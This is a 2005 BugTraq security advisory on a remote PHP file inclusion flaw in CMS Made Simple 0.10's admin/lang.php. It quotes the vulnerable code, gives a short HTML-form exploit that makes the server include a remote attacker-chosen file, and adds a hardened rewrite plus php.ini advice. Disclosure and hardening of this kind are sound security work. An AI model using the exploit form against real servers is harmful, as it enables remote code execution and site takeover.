BugTraq
CMS Made Simple <= 0.10 - PHP injection Aug 31 2005 07:18PM
groszynskif gmail com (1 replies)
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/

Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Background:

CMS Made Simple is an easy-to-use content management
system for simple, stable content sites. It uses PHP, MySQL
and the Smarty templating system.

--------------------------------------------------------

Vulnerable code exists in ./admin/lang.php:

<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
    ...
    #Check to see if there is already a language in use...
    if (isset($_POST["change_cms_lang"])) {
[!]     $current_language = $_POST["change_cms_lang"];
        setcookie("cms_language", $_POST["change_cms_lang"]);
    } else if (isset($_COOKIE["cms_language"])) {
        $current_language = $_COOKIE["cms_language"];
    } else {
        ...
    }

    #Ok, we have a language to load, let's load it already...
    if (isset($nls['file'][$current_language])) {
        foreach ($nls['file'][$current_language] as $onefile) {
[!]         include($onefile);
        }
    }
    ...
}
...
?>
--------------------------------------------------------

Exploit:

example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
    <input type=hidden name=change_cms_lang value=vx>
    <input type=submit name=test VALUE="do it">
</form>
EOF

--------------------------------------------------------

Contact:

Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
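For comparison, a hardened rewrite of the same language-loading logic, added here as an example and not code from CMS Made Simple or its author; it assumes one translation file per locale under ./lang/ (e.g. ./lang/en_US.php) and a fixed list of supported locales. The three points it closes are the ones the advisory marks with [!]: the catalogue ($nls) is built in code rather than taken from the request, the language name is checked against that catalogue before use, and include() only ever sees a path that realpath() resolves inside ./lang/.

```php
<?php
// Added example, not CMS Made Simple's own code. Assumed layout: one
// translation file per locale under ./lang/, e.g. ./lang/en_US.php.
// The catalogue is built from a constant list right here, so a request
// parameter such as nls[file][...] can never seed it.
$LANG_DIR = __DIR__ . '/lang';
$nls = array('file' => array());
foreach (array('en_US', 'de_DE', 'fr_FR') as $code) {
    $nls['file'][$code] = array($LANG_DIR . '/' . $code . '.php');
}

// Pick the requested locale, but only if it is a key of the catalogue;
// anything else falls back to the default instead of reaching include().
function resolve_language(array $nls, array $post, array $cookie, $default = 'en_US')
{
    $requested = $default;
    if (isset($post['change_cms_lang'])) {
        $requested = (string) $post['change_cms_lang'];
    } elseif (isset($cookie['cms_language'])) {
        $requested = (string) $cookie['cms_language'];
    }
    if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $requested)
        || !isset($nls['file'][$requested])) {
        return $default;
    }
    return $requested;
}

// Include only files that really resolve to a path inside $LANG_DIR:
// realpath() returns false for URLs and collapses any ../ segments.
function load_language_files(array $files, $lang_dir)
{
    $base = realpath($lang_dir);
    foreach ($files as $onefile) {
        $real = realpath($onefile);
        if ($base === false || $real === false
            || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
            continue;   // not a file under ./lang/, refuse it
        }
        include $real;
    }
}

$current_language = resolve_language($nls, $_POST, $_COOKIE);
if (isset($_POST['change_cms_lang'])) {
    setcookie('cms_language', $current_language); // validated value, not raw input
}
load_language_files($nls['file'][$current_language], $LANG_DIR);
```

Even with this in place, allow_url_fopen / allow_url_include should stay off and register_globals should be disabled in php.ini, so that no other script in the tree can be fed a remote path the same way.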

Re: CMS Made Simple <= 0.10 - PHP injection Sep 05 2005 10:02PM
garaged (garaged gmail com)